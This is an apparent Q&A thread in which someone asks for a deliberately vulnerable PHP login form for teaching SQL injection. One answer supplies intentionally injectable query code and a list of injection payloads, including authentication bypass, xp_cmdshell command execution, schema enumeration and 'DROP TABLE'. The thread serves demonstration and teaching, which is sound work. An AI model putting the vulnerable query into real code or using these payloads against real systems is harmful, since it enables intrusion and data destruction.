# How to create a SQL Injection Test Site

Tags: php, sql, sql-injection

I want to create a simple login and registration form, that allows me to demonstrate SQL injection, but I haven't been able to do so currently. Every time I attempt a sample form, SQLmap can't attack it. Can somebody give me a very simple and basic login and registration form that I can use to demonstrate SQL injection?

Comment: First time user inquiring about MySQL injection. Idk about this..

Comment: I was at a college camp, and my topic was SQL injection. I can assure you, I wasn't using it for malicious reasoning.

Answer (score 1, accepted):

If you like a massive sql test, there are a library that help me sometimes:
http://sqlmap.sourceforge.net

It run a lot of sqlinjections tests and return  great report.

Answer (score 6):

Just run the simplest unprotected query:

`$query = "SELECT * FROM users WHERE username = ".stripslashes($_POST['username'])." AND password = ".stripslashes($_POST['password'])`

and enjoy! The `stripslashes()` part is there in case you haven't magic_quotes already disabled (as it should be), to avoid some automatic escaping; otherwise you'll have purest injectable input, just pick up any sql injection you might find on the internet and see. Some example:

```
' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`
```

And so on

Comment: Which would only be useful on prehistoric/poorly-installed PHPs that have magic_quotes_gpc enabled.

Comment: @Marc B There are still around there...Some of my company's clients have server with php4, others php 5.1, many have magic_quotes_gpc turned ON (and websites in Mambo CMS `*shivers*`)

Answer (score 1):

Google for some prexisting pages i.e.:

http://www.greensql.net/node/3

Alternatively, you could just create a basic search box that searches a table in DB. Fill the table with random names and demonstrate how the search works and how SQL injection can drop the table, etc.